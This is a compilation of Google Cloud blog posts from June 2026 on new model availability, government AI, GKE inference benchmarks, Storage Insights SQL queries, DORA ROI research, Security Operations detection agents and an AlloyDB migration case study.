Cloud Blog

Claude Fable 5: Available on Google Cloud

Tue, 09 Jun 2026 18:00:00 +0000

Claude Fable 5, Anthropic’s latest frontier model, is now generally available on Google Cloud. This launch is the latest proof point of our ongoing commitment to bring the industry's latest models straight to our Agent Platform.

Claude Fable 5 brings the best of Anthropic model capabilities to all customers, with strong safeguards designed to make it safe for general use. Designed for complex, multi-step reasoning, Claude Fable 5 is good for demanding tasks like advanced software development, long-horizon agents, and deep multimodal document analysis. For more information about this release, visit Anthropic’s blog.

Build with Claude Fable 5 and other models from Anthropic — including Claude Opus 4.8 and Claude Sonnet 4.6 — today on Agent Platform.

Gemini for Government: Your blueprint for mission impact

Tue, 09 Jun 2026 17:00:00 +0000

The public sector has reached a critical inflection point. For years, organizations have explored what’s possible through isolated AI pilots and experimentation. Today, the question has shifted to “what creates impact?” where the focus is no longer on hypotheticals, but on achieving real productivity gains, improving services and outcomes, and advancing your mission - right now. Meeting this moment requires more than just a powerful model—it requires an integrated approach with the security, reliability, scale, and cost-efficiency that public sector missions require.

Today, public sector organizations are moving swiftly from AI assistants and chatbots to a full-scale agentic taskforce - here’s how they are doing it.

Building on a unified foundation

To move AI and agents into production at scale, you need to remove the friction of integration. Google Cloud offers a complete AI stack designed to work as one unified system. We believe this integrated stack is the engine for true transformation in the agentic era.

Let’s take a closer look at this integrated stack:

It all starts with the AI Hypercomputer — our purpose-built infrastructure foundation is optimized for the physics and scale of the agentic era, and powered by both GPUs and TPUs. We continue to invest in our portfolio and made several announcements at Cloud Next ‘26 including the launch of our eighth-generation TPU and updates to our cross-cloud infrastructure which includes new innovations across fluid compute, secure cross-cloud connectivity, the unified data layer and digital sovereignty.
We deliver research from Google DeepMind as well as frontier models to provide intelligence with speed and efficiency. We offer choice across Google’s leading models like our recently announced Gemini 3.5 alongside other open and third-party options.
Our agentic data cloud grounds your AI in trusted real-time organizational truth and context. We help you build a 'system of action' with our latest breakthroughs announced at Cloud Next ‘26 including the Cross-cloud Lakehouse and Knowledge Catalog.
With our agentic defense you get zero-trust protection that secures your entire AI lifecycle from code to cloud. To help you navigate the agentic era securely, we recently launched Google AI Threat Defense — an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your organization.
At Cloud Next ‘26 we unveiled Gemini Enterprise Agent Platform, our comprehensive platform to build, scale, govern and optimize agents with architectural rigor. This platform brings together model selection, model building, and agent building capabilities with new features for agent integration, development, orchestration, and security.
All of this comes together at the top with pre-built specialized agents and applications that are ready to transform your organization from day 1. We announced new capabilities at Cloud Next ‘26 including Workspace Intelligence - a secure and dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail), your active projects, your collaborators, and your organization's domain knowledge.

Delivering uncompromising security and control

For many public sector organizations, security is the mission. This new era of mission-ready and secure AI is defined by the ability to work across silos and legacy systems. IT system administrators have access to a built-in AI Control Dashboard—a single pane of glass to centrally visualize, secure, and audit the organization’s entire AI estate. Through Agent Registry, administrators maintain complete visibility into active agents and their grounded data sources, ensuring that every interaction stays within the strict guardrails of agency policy and security mandates. Model Armor provides comprehensive protections against prompt injection, sensitive data leaks, and harmful content. Built on a Zero Trust foundation, Gemini for Government includes FedRAMP High-authorized security and compliance features and is backed by a Data Privacy Guarantee stating that Google does not train its foundational models on customer data. At Google Cloud Next ‘26, we introduced new development tools to secure AI-generated code and mitigate the risk of shadow AI, and also shared how we are protecting AI and cloud apps across any infrastructure with Wiz.

Scaling agents across the organization

In order to realize AI’s true potential, it must be in the hands of your people — caseworkers, inspectors, analysts and more. Google Public Sector was proud to be the first technology provider to offer an enterprise AI tool, Gemini for Government, through GenAI.mil to more than three million civilian and military personnel. We recently introduced a new feature within Gemini for Government on GenAI.mil called Agent Designer which enables DoW civilian and military personnel to build their own agents to support unclassified work tasks.

With Agent Designer, non-technical users can build sophisticated AI agents using natural language through no-code interfaces. Our goal is to provide the tools to empower everyone in the organization to build and use agents that connect securely to existing systems and enterprise applications. This is all about using AI and agents to automate manual and time consuming tasks, improve productivity, and ensure you and your teams can apply your experience and judgment to the most critical aspects of your work.

Achieving tangible ROI

According to our recent ROI of AI in the public sector report, agentic and generative AI is already helping public sector teams get more done. According to our findings, 70% of public sector leaders report improved productivity from gen AI. Of those reporting productivity, 46% say employee productivity has at least doubled. This directly translates into faster response times, more efficient public services, and overall better outcomes. Gemini Deep Research Agent and NotebookLM are force multipliers for the public sector, transforming how complex research, deep work and analysis is conducted.

Your blueprint for mission impact

With Gemini for Government, you are able to move beyond AI exploration and pilots, to real world applications and agents - at scale. This is all about applying technology to amplify human capacity, accelerate strategic decision-making, and advance your mission.

Register to attend our Gemini for Government webinar on June 11 where we’ll dive deeper into how to leverage data, security, and an integrated AI stack. Whether you are looking to scale day-one use cases across your organization, empower your internal champions, or are just getting started, you will leave with a clear path forward to drive impact and advance your mission today.

Report: GKE Inference Gateway delivers up to 92% faster AI responses

Tue, 09 Jun 2026 16:00:00 +0000

As generative AI moves from experimental pilots to massive production environments, the efficiency of your infrastructure becomes the ultimate differentiator. One way to get the most out of it and minimize costly accelerator idle time is to leverage the Google Kubernetes Engine (GKE) Inference Gateway, which intelligently routes generative AI workloads based on real-time model server metrics.

Instead of relying on traditional, naive round-robin load balancing — which frequently triggers expensive accelerator recomputation and spikes user latency — this native extension of the GKE Gateway utilizes advanced capabilities like prefix caching and model-aware routing. By ensuring requests land on the exact accelerator that is primed to process them right away, GKE transforms how you can serve your large language models (LLMs), with excellent hardware utilization and ultra-fast response times.

In fact, according to an independent benchmark report, GKE Inference Gateway outperforms the next leading managed Kubernetes service with 15.7% higher throughput, 92.8% shorter wait times, and 62.6% lower inter-token latency. This performance takes LLM-based applications from sluggish and expensive to fast and production-grade.

That performance tracks with Snap’s experience using GKE Inference Gateway.

“At Snap, we are integrating llm-d into our production AI infrastructure to facilitate high-performance inference at scale. By employing prefix-cache-aware routing, we have achieved prefix cache hit rates ranging up to 75-80%. We appreciate the open-source nature of llm-d, as it enables seamless integration with our Envoy-based Service Mesh.” - Vinay Kola, Senior Manager, Software Engineering, Snap Inc.

In this blog, we take a closer look at GKE Inference Gateway’s prefix caching, complete with examples. We also provide more details about its benchmark results. Let’s jump in.

The secret to low-latency AI: Prefix caching

Prefix caching optimizes LLM performance by storing the KV cache (activation states) of long, repetitive prompt prefixes. When consecutive user requests share the same system instructions, context, or documentation, the model entirely skips reprocessing those tokens. GKE Inference Gateway reads incoming request prefixes and matches them to the specific pods that already hold that data in memory. This eliminates the "thinking" tax on your GPUs and TPUs, turning heavy reasoning loops into near-instant answers.

Use case 1: Documentation and codebase Q&A with retrieval-augmented generation (RAG)

When querying massive enterprise repositories, you can ground your LLMs’ responses without any added latency by pinning entire documentation sets as static cached prefixes, using RAG.

Instead of forcing an LLM to re-read thousands of lines of API references or corporate wikis for every single user question, GKE Inference Gateway routes the query to a pod that already has that specific context warmed up in its KV cache. The LLM only has to compute the user's brief, dynamic question, completely bypassing expensive document re-evaluation.

code_block: <ListValue: [StructValue([('code', '[STATIC PREFIX - STAYS IN CACHE] You are an expert AI assistant specializing in technical documentation. Below is the complete API documentation for our software platform. Use this context to answer the user\'s questions accurately. If the answer cannot be found in the documentation, say "I cannot find that in the provided context." \r\n\r\n<documentation> [10,000+ words of API reference documentation, endpoints, error codes, etc.] </documentation> \r\n\r\n[DYNAMIC SUFFIX - CHANGES PER REQUEST] User Question: How do I handle a 429 rate limit error using the Python SDK?'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e03dd90>)])]>

Use case 2: Multi-turn chat

You can also use prefix caching to maintain customer service interactions across thousands of simultaneous sessions without compounding compute costs. You can do so by caching permanent system personas and core business rules directly on the LLM server.

In enterprise chat architectures, the base system prompt and reference tables remain completely identical across millions of customer interactions. GKE Inference Gateway handles these multi-turn conversations using context-aware routing to bypass repetitive token processing, so that your chatbot stays ultra-responsive even under peak traffic.

code_block: <ListValue: [StructValue([('code', '[STATIC PREFIX - STAYS IN CACHE] \r\n-System Persona: You are "FinBot", a helpful, empathetic, and compliant virtual assistant for ABC Banking Solutions. You must strictly adhere to the following rules: 1. Never provide concrete investment advice. 2. Always verify if the user is asking about checking or savings. 3. Keep your answers under 3 sentences. 4. If a user is angry, offer to connect them to a human manager. \r\n\r\nHere is the current interest rate table for May 2026: \r\n- Savings: 4.2% APR \r\n- Checking: 0.5% APR \r\n- CD (12-month): 5.1% APR \r\n\r\n[DYNAMIC SUFFIX - CHANGES PER REQUEST] User: Hi, I\'m trying to figure out how much I\'d make if I locked away $10,000 for a year?'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e03d4c0>)])]>

GKE outperforms alternative managed Kubernetes solutions

To validate these architectural advantages, Principled Technologies recently released an independent benchmark report comparing GKE (equipped with the GKE Inference Gateway) against a standard third-party managed Kubernetes service utilizing conventional round-robin HTTP load balancing.

Tested on a Llama 3.1 8B Instruct shared prefix workload using identical hardware (eight NVIDIA A100 40GB GPUs) the results reveal a massive performance gap between the two Kubernetes services. GKE didn't just win; it completely redefined inference efficiency across three critical metrics:

Higher throughput: 15.7% more tokens processed per second, enabling higher request capacity or reduced hardware needs for the same workload
Much faster time to first token (TTFT): 92.8% shorter wait times, producing dramatically quicker perceived response starts for interactive scenarios
Lower inter-token latency (ITL): 62.6% reduction, resulting in smoother and faster token streaming after the first token

Figure 3: Mean latency (normalized time per output token) of GKE with GKE Inference Gateway and third-party managed Kubernetes service on the Llama 3.1-8B Instruct LLM on the Shared prefix use case. Both solutions used the same hardware. Source: Principled Technologies

	GKE	3rd party ManagedKubernetes Service	GKE Advantage
Mean outputtoken throughput	7,169.21 outputtokens per second	6,042.05 outputtokens per second	15.7% more outputtoken throughput
Mean time tofirst token (TTFT)	188.36 ms	2624.73 ms	92.8% less TTFT
Mean inter-tokenlatency (ITL)	30.20 ms	81.03 ms	62.6% lower ITL

Figure 4: GKE with GKE Inference Gateway delivered superior AI inference compared to a third-party managed Kubernetes service using standard HTTP LB.

Ready to accelerate your gen AI inference workloads?

Whether you’re deploying inference workloads such as real-time customer support agents, dynamic coding assistants, or sub-second fraud detection models, infrastructure latency dictates your user experience. By ensuring shared prompt prefixes hit the active cache nearly 100% of the time, GKE Inference Gateway transforms your LLMs from sluggish, expensive reasoning engines into rapid, capital-efficient, production-grade powerhouses.

Ready to explore the performance advantage that GKE Inference Gateway can bring to your gen AI workloads? Access the full benchmark report here and watch this explainer video to learn more.

^{A special thanks to Dan Sullivan, Senior Performance Architect, Principled Technologies.}

Storage Insights datasets: Enabling org-wide operational discovery with activity insights

Tue, 09 Jun 2026 16:00:00 +0000

As enterprise storage footprints scale to billions of objects, AI applications and agentic workloads are fundamentally shifting the role of storage from a passive repository to the foundation of the data platform. This is driven by a surge in unstructured model data and the billions of actions performed on those objects, including session logs and audit trails. To manage this and answer questions about cost, operations, and security, storage and platform admins need to go beyond knowing what data they have, to understanding exactly how it is being accessed, moved, and modified.

To help, we're excited to announce activity insights within Storage Insights datasets. Now generally available, these new views provide visibility into the operational details of your Google Cloud Storage assets, enabling data-driven cost optimization and faster troubleshooting. For example, with activity insights, you can answer questions like:

Are my objects located in the right storage classes within my buckets?
What regions is my bucket interacting with the most so I can assess if it is optimally located?
Where are there errors across operations on my storage estate and why?

Answering these questions confidently is the key to unlocking cost optimizations and reclaiming engineering time. Storage Insights datasets, a feature of Storage Intelligence for Cloud Storage, provides daily metadata and frequent activity insights (typically within four hours of the activity) so you have better visibility into your storage estate. While Storage Intelligence is a unified management product with capabilities like Bucket relocation, Batch operations and Gemini Cloud Assist, this blog focuses on how you can leverage Storage Insights datasets for operational optimization.

What are Storage Insights datasets?

Storage Insights datasets deliver an automated, query-ready BigQuery index of your entire storage estate, complete with raw metadata and activity insights, replacing manual, error-prone data collection. Storage Insights datasets can be customized in scope: create a dataset for your entire org, a specific folder, a project, or a set of projects, or even specific buckets. The dataset then refreshes with regular updates, giving you a comprehensive view of your storage.

From static metadata to live intelligence

Storage Insights datasets are your go-to tool for understanding your storage metadata, acting as an inventory management tool, scanning object metadata (storage class, location, age, custom metadata) and organizing it into a powerful, queryable BigQuery-linked dataset. This is crucial for knowing what data you have (learn more about how to optimize storage spend with Storage Insights datasets here).

But what if you also knew how and when that data is being used?

Storage Insights datasets now offers a set of new views that capture:

Object-level activity, including writes, updates, deletes, and errors
Bucket-level aggregate activity, including total object operations, a breakdown by type of operations, total errors and most active prefixes
Bucket-level regional traffic activity, including ingress and egress bytes per region that interact with your bucket
Project-level aggregate activity, including total object operations, a breakdown by type of operations and total errors

This data flows directly into new BigQuery views within your dataset so you can run analytics queries for specific insights, interact with the data via Gemini or simply connect it to powerful Looker dashboards for visualization.

This moves you from a static snapshot to a dynamic, queryable analysis of your data's entire lifecycle. It's the difference between knowing what's in your warehouse and knowing what’s used and when.

Three ways to use activity insights immediately

Here’s what you can do, starting today, with activity insights in Storage Intelligence datasets.

1. Right-size your storage estate

The challenge: You have terabytes of data in Standard or Nearline class storage that you believe is cold. But without proof, moving it to Coldline or Archive class is risky. What if a critical process still needs to read it once per quarter?
The solution: With the new Storage Intelligence views that surface activity insights, you can now identify buckets that have had minimal read/write activity over the last 30, 60, or 90 days.
The outcome: Apply or fine-tune lifecycle policies to transition this data to more cost-effective storage classes.

For example, here’s a SQL query to order all the buckets in your estate with little to no activity in the last six months:

code_block: <ListValue: [StructValue([('code', 'SELECT name, location, project, totalRequests\r\nFROM\r\n `[project]`.`[dataset]`.`bucket_activity_view`\r\nWHERE\r\n snapshotEndTime >= TIMESTAMP(DATE_SUB(DATE_TRUNC(CURRENT_DATE(), MONTH), INTERVAL 5 MONTH))\r\n AND snapshotEndTime < CURRENT_TIMESTAMP()\r\nORDER BY totalRequests ASC\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bc1c0>)])]>

2. Architect for global performance with data-driven bucket placement

The challenge: Your team set up a multi-region bucket to serve a global application. But a year later, is that still the right architecture? What if 99% of your traffic is now coming from a single region?
The solution: Analyze the access patterns in your new bucket_region_activity_view table. You can easily pinpoint which regions are driving read and write activity for the bucket.
The outcome: Make data-driven decisions to co-locate your bucket with your compute. You might find that changing a multi-region bucket to a single-region one (or vice-versa) can lead to significant cost-savings and even improve performance.

For example, here’s a SQL query to break down the egress and ingress traffic pattern for a bucket across regions:

code_block: <ListValue: [StructValue([('code', "SELECT\r\n requestLocation,\r\n bucketLocation,\r\n SUM(requestBytes) AS total_request_bytes,\r\n SUM(responseBytes) AS total_response_bytes\r\nFROM\r\n `[project]`.`[dataset]`.`bucket_region_activity_view` \r\nWHERE\r\n name = '[bucket name]'\r\nGROUP BY\r\n requestLocation,\r\n bucketLocation;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bcc70>)])]>

Shipt, a retail technology platform and same-day delivery service, has been using Storage Intelligence capabilities to inform their data location decisions:

“Storage Intelligence enables us to efficiently manage over 2 billion objects, delivering cost and performance optimization. With Insights datasets, we detected and analyzed egress charges from multi-region buckets, identifying opportunities to improve efficiency by co-locating compute and storage. By leveraging the Bucket Relocate capability, we seamlessly moved 1.3 Petabytes of data from multi-region to regional storage, achieving substantial cost savings while maintaining uninterrupted application performance and data pipeline continuity.” - Ron Cuirle, Director of Engineering - Cloud Platforms, Shipt

3. Demystify and resolve operational hotspots

The challenge: Your team sees a spike in 429 (too many requests) errors. In a massive environment, this is rarely just a performance hiccup — it’s expensive! These errors trigger automatic retries, which often lead to a cycle of high-frequency, billable operations that drive up your Class A costs. Pinpointing exactly which object or prefix is causing this can be a time-consuming troubleshooting nightmare.
The solution: The new Storage Insights datasets views provide granular details on these errors, right in BigQuery. You can query for 429 errors and see exactly which objects and prefixes are under pressure.
The outcome: Additionally, you can pinpoint the cause of your 429 errors, moving your team from troubleshooting to resolution.

For example, here’s a SQL query to analyze 429s occurring across your estate, where they are happening and why:

code_block: <ListValue: [StructValue([('code', 'SELECT\r\n requestOperation,\r\n errorReason,\r\n objectName,\r\n bucketName,\r\n requestCompletionTimestamp,\r\n project\r\nFROM\r\n `[project]`.`[dataset]`.`object_events_view` \r\nWHERE\r\n responseStatus = 429\r\nORDER BY\r\n requestCompletionTimestamp DESC;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bc970>)])]>

Getting started

As your organization grows with Google Cloud, the scale of your data will only increase. Stop relying on archival data and start optimizing your organization’s storage estate. Cloud Storage Storage Insights datasets with activity insights turn massive data estates from complex operational challenges into clearly understood, highly optimized assets.

To get started, check out use our pre-configured Looker Studio template here to connect to your dataset for quick analysis and value:

For example: View the trend for Total Reads on your bucket over time

Or, analyze the ingress and egress traffic patterns for your bucket:

Ready to turn insight into action?

Enable Storage Intelligence today in the Google Cloud console.
Configure your dataset today and query your data directly in BigQuery or connect to our Looker template for quick and easy visualization.
Reference our videos for more information on Storage Intelligence and How to Get Started.
Read more about how to optimize your Cloud Storage footprint with Storage Insights datasets.

How to unlock true ROI in software development – a deep dive into the latest DORA research

Tue, 09 Jun 2026 16:00:00 +0000

How do you prove the business value of generative AI to your teams?

Technology and finance leaders need to show the clear business value of AI projects to secure ongoing funding. While measuring return on investment (ROI) is a key part of validating your technical strategy, long-term success ultimately depends on building the organizational systems and culture needed to make AI work.

To help you evaluate the costs and business benefits of AI, we recently shared the DORA: ROI of AI-assisted software development report. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth.

Here are the key findings from the report, and how you can use them to support your overall technology strategy.

Insight #1: Navigating the J-curve of AI value realization

It is important to be realistic about how quickly you will see a return on your AI investments. While AI can act as a powerful amplifier for software engineering, the path to financial value is rarely a straight line. Most organizations will instead encounter a J-curve: a temporary productivity dip and period of instability associated with early adoption.

This temporary drop is a normal part of adopting new technology, rather than a sign of a failing strategy. The report points to three main reasons why this happens:

The learning curve: Teams require dedicated time away from regular feature delivery to adapt their daily workflows and master advanced techniques, evolving from simple prompting to building systems based on context and intent.
The verification tax: Because AI dramatically increases the sheer volume of code produced, developers must invest extra time rigorously reviewing generated outputs to ensure trustworthiness, prevent hallucinations, and meet internal architectural standards.
Pipeline adaptation: As individual developers generate code significantly faster, downstream processes like testing and change approvals often become bottlenecks and must be actively scaled to handle the increased throughput.

Budgeting for this initial learning phase is key to making the transition work. By anticipating this temporary drop in productivity, you can confidently keep your AI projects moving forward, knowing that these early challenges are an investment in your team's long-term speed.

The J-Curve of AI value realization

Insight #2: Understand the market divide on AI returns

DORA’s state of AI-assisted software development report shows that 90% of DORA survey respondents report using AI at work. Despite nearly universal adoption, actual financial impacts vary across organizations. Across the market, some companies see clear value from their engineering investments, while others struggle with unexpected costs.

When a project falls short, it’s often because the team lacks the organizational support to make it work. To get the returns you expect, you need to prepare your workflows and teams to adopt the new technology.

Insight #3: Calculating your AI ROI is essential

Building a realistic financial model for AI starts with looking at where it actually adds value. Across the software development lifecycle, AI can help your team reduce costs, boost productivity, improve security, and deliver a better experience for both developers and users.

To assist in modeling this for your organization, you can use this interactive ROI calculator.

This tool helps you explicitly forecast both the visible expenses and the hidden realities of AI adoption.
You can explore the mechanics, adjust the assumptions to match your reality, and build your own estimate.

The value model—from adoption to ROI

Get started

Download the full report: Explore the complete framework to quantify your AI investments, navigate the J-Curve, and map your AI investment roadmap.
Try out the interactive ROI calculator: Visit https://dora.dev/ai/roi/calculator to estimate your organization's potential returns and build a defensible business case.
Watch this Cloud OnAir webinar: From cost center to value engine: Building your business case for AI-assisted development.

Detecting and containing AI-powered threats with Google Security Operations agents

Tue, 09 Jun 2026 16:00:00 +0000

To defend against the growing range of AI-accelerated threat actors, organizations need to be able to respond faster to outpace the adversary.

Recently, we announced Google AI Threat Defense, an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your business. Based on Google’s own approach to today’s threats and vulnerability management, it’s centered on a four-step framework: Prepare, scan and prioritize, remediate, and monitor.

Today, we’re sharing more details on how Google Security Operations works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or can not patch. The remediation gap represents a critical vulnerability.

According to M-Trends 2026, the exploitation of vulnerabilities has become the most common initial infection vector. Notably, the report also indicates that the mean time to exploit has dropped to an estimated minus seven days, meaning exploitation frequently occurs even before a patch is officially released. Google Security Operations delivers vital operational fabric to autonomously contain active attacks across your entire environment.

Google Security Operations supports AI Threat Defense to monitor, detect, and respond to threats.

Engineered around a comprehensive approach that uses compensating controls with proactive security to strengthen operational resilience, Google Security Operations is built on a strategic, three-part approach to cross-environment visibility across your entire attack surface:

Continuous and autonomous coverage analysis and detection generation
Autonomous investigation, containment, and response
Retroactive hunting

Designed to help you see and respond to threats faster than ever before, we deliver these capabilities at machine-scale and machine-speed. Together with Google AI Threat Defense, we’re able to provide the autonomous platform you need to outpace AI-driven attacks.

1. Continuous and autonomous coverage analysis and detection generation

While proactive defense can identify vulnerabilities before they can be exploited, there will be applications that you can not patch, as well as potential gaps in the time it takes to remediate vulnerabilities.

The 2026 Verizon Data Breach Investigations Report underscores the magnitude of this challenge. In a study encompassing over 13,000 organizations, only 26% of vulnerabilities identified on the CISA Known Exploited Vulnerabilities (KEV) list had been fully remediated. Moreover, the median duration required to achieve full patching after detection stands at 43 days. Clearly, you still need continuous monitoring to detect threats in your environments.

Detection Engineering agent. Results for illustrative purposes.

The Detection Engineering agent in Google Security Operations can automatically translate new exploitation patterns of unpatched vulnerabilities into custom detections for your specific environment. Available in preview, it analyzes a diverse array of input sources to quickly and effectively recognize malicious activity, so you can uncover novel attack patterns evolving from new and unpatched vulnerabilities.

The agent’s sources include Google Threat Intelligence (such as emerging threat intelligence, new attack patterns curated by Mandiant, offensive tool repositories, red and purple team reports, autonomous malware analysis, open-source detection repositories and blogs), and internal security telemetry.

The workflow of the Detection Engineering agent.

To automatically find and fill coverage gaps tailored to your environment, the agent proactively builds new rules and validates them with synthetic events to help ensure your environment is covered before an exploit hits.

2. Autonomous investigation, containment, and response

If a threat is detected, you need to immediately and autonomously assess and respond to protect your environment. By bringing together visibility from cloud and enterprise assets, including endpoints, on-premises firewall, identity, network, and custom application logs, your security operations center (SOC) can gain the full context of an attack, and unify disparate signals into a complete, actionable narrative the moment an adversary strikes.

The Triage and Investigation agent in Google Security Operations, generally available, helps analysts drastically reduce time to respond by autonomously investigating alerts, gathering evidence for analysis, and providing verdicts with comprehensive explanations. It can help security analysts automate decision-making, alert closure, and remediation flows, allowing them to spend more time prioritizing high-priority threats instead of false positives.

The agent has already investigated over 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.

While identifying threats is critical, the ultimate goal is rapid remediation. Agentic automation, available in preview, can help contain attacks by combining dynamic AI agents — which autonomously gather evidence and reason through complex alerts — with deterministic enterprise playbooks.

This hybrid approach ensures that analysts remain in absolute control of critical, high-impact actions while using AI to safely automate decision-making and remediation workflows.

3. Retroactive hunting

Even with autonomous detections and rapid-response handling of active threats, stealthy adversaries and zero-day exploits can sometimes bypass frontline controls. To achieve operational resilience, security teams must also look backward through their data to uncover hidden compromises.

Strong, effective defensive strategies rely on more than just reacting to alerts. The Threat Hunting agent, available in preview, can help teams proactively hunt for novel attack patterns and stealthy adversary behaviors that bypass traditional defenses.

By scouring petabytes of enterprise telemetry (including historical logs) for subtle anomalies the agent fundamentally shifts the SOC posture from reactive to deeply proactive.

Auditing the Axios supply chain attack

When adversaries can generate unique exploits and command-and-control (C2) infrastructure at zero marginal cost, static indicators like hashes and IPs decay instantly. Defenders must instead detect the behavioral tactics, techniques, and procedures (TTPs) of the attack.

We had the Detection Engineering agent audit our coverage against the recent Axios supply chain attack (UNC1069). The agent mapped the campaign intelligence into behavioral threat detection opportunities (TDOs), simulated the attack chain using high-fidelity synthetic UDM logs, and ran them against active rules.

Google Detection Engineering agent output.

We successfully flagged the execution phases in the middle (renamed PowerShell and macOS background shells), but were blind at the initial entry point (NPM postinstall dropper) and the final C2 exit point.

By exposing these blind spots, the agent helped us proactively engineer custom YARA-L rules to close the loop at the first and final steps of the kill chain. You can sign up for the Google Security Operations Detection Engineering agent preview today.

Next steps

By integrating Google Security Operations Gemini-native specialized agents into your workflow, you can autonomously generate detections, orchestrate containment, and hunt for stealthy threats at machine speed. This allows you to maintain a resilient defense even when primary controls fail, ultimately driving a 70% reduction in both breach risks and costs.

Google AI Threat Defense working alongside Google Security Operations can help you consistently outpace automated adversaries. To learn more about how Google AI Threat Defense and Google Security Operations can help you fight AI with AI, check out our Security Talks online event on June 10.

Modernizing Healthcare: How Alcidion achieved greater stability and performance with AlloyDB

Mon, 08 Jun 2026 16:00:00 +0000

In clinical informatics, every second counts. For Alcidion, a global leader in smart health solutions, the mission is simple but critical: use technology to reduce cognitive load for clinicians and present the right information at the right time to save lives.

Whether it’s managing patient flow in an emergency department or ensuring a patient is in the correct ward to avoid adverse outcomes, Alcidion’s flagship platform, Miya Precision, serves as a dynamic intelligent care platform for modern hospitals. To power this mission, the platform recently underwent a major architectural transformation, migrating from a legacy Microsoft SQL Server environment to Google Cloud’s AlloyDB for PostgreSQL.

The challenge: overcoming performance bottlenecks

Operating in an industry where data integrity and uptime are non-negotiable, Alcidion faced several technical and operational hurdles with its previous setup:

Operational overhead: Managing persistent backends for SQL Server required significant manual effort. The team had to manually balance database loads between elastic pools to maintain performance while trying to optimize costs. They also had to constantly manage the gap between allocated and used space to prevent shared pools from being consumed by excessive slack space.
Performance latency: Complex JSON data processing, critical for modern health informatics, was taking up to 30 minutes for certain jobs.
Stability concerns: The team sought a more stable Kubernetes environment and a persistent backend that could scale without constant administrative intervention.

The solution: a smooth migration to AlloyDB

Alcidion used the Database Migration Service (DMS) to move from SQL Server to AlloyDB, achieving a remarkably efficient cutover. The total learning and migration process took under one month, with the core database move completed in only one and a half weeks.

By creating custom synchronization tools and using Google Cloud’s managed services, the team reduced the final transition window to just 15 minutes. Alcidion achieved this by spinning up a new Google Cloud instance synchronized to the active one, with both accessible via unique fully qualified domain names. The new environment remained in read-only mode for customer validation.

During the final cutover, the old instance was set to read-only, synchronization was halted, and external integration links were toggled to the new environment. This streamlined process allowed users to log into the new instance and resume work within minutes, with the primary delay being DNS record updates.

Alcidion chose a fully managed AlloyDB service to eliminate control plane tasks and administrative overhead. This shift allows their engineering team to focus on clinical innovation and product development rather than "managing the container" or the underlying database infrastructure.

Being able to cut over to AlloyDB in about 15 minutes had our users back to work almost immediately. For a system clinicians rely on around the clock, that kind of smooth transition gave Alcidion real confidence.

The results: impact by the numbers

The shift to AlloyDB and Google’s Agentic Data Cloud has delivered immediate, quantifiable improvements for Alcidion and its healthcare customers:

Faster data processing: Data processing that previously relied on SQL Server stored procedures — a process that became increasingly time-consuming as data volumes grew — has been transformed. By migrating to AlloyDB and using BigQuery and Dataflow for processing, Alcidion has seen jobs that once took 30 minutes now complete in just 5 to 60 seconds.
Enhanced stability: The migration has delivered a step-change in reliability. In the previous environment, the team faced monthly disruptions, ranging from failed scheduled maintenance to connectivity issues that required manual intervention. In contrast, AlloyDB and Google Cloud’s compute services have proven exceptionally stable, allowing the team to move away from the "firefighting" mode associated with frequent infrastructure crashes.
Reduced cognitive load: By simplifying their backend and clinical dashboards, Alcidion’s SREs have significantly reduced their administrative burden. This shift has freed the team to focus on high-value innovation, such as refining predictive analytics and generative AI that empower clinicians to make informed clinical decisions faster.

Future vision: AI and beyond

Alcidion isn't stopping at database modernization. The move to AlloyDB is a foundational step for their next phase of growth:

AlloyDB columnar engine: The team is exploring the columnar engine for a second round of query optimization and real-time analytics.
Generative AI apps: Alcidion is actively working with Google to use AlloyDB’s Gemini Enterprise Agent Platform integration to perform concept analysis and pick out critical clinical insights from vast datasets.

By moving to AlloyDB, Alcidion has improved its stability and performance and built a strong foundation to keep delivering smarter, safer care to hospitals worldwide.

Ready to modernize your database? Learn more about how AlloyDB can transform your operational workloads.

What’s new with Google Cloud

Fri, 05 Jun 2026 16:00:00 +0000

Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more.

Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud blog 101: Full list of topics, links, and resources.

aside_block: <ListValue: []>

Jun 1 - Jun 5

Modeling the physical world with BigQuery Graph
Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this post, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.
Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)
Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.

Register for the June 18 Spanish Community TechTalk

May 25 - May 29

Anthropic’s Claude Opus 4.8 is now available on Gemini Enterprise Agent Platform. As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.
API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs
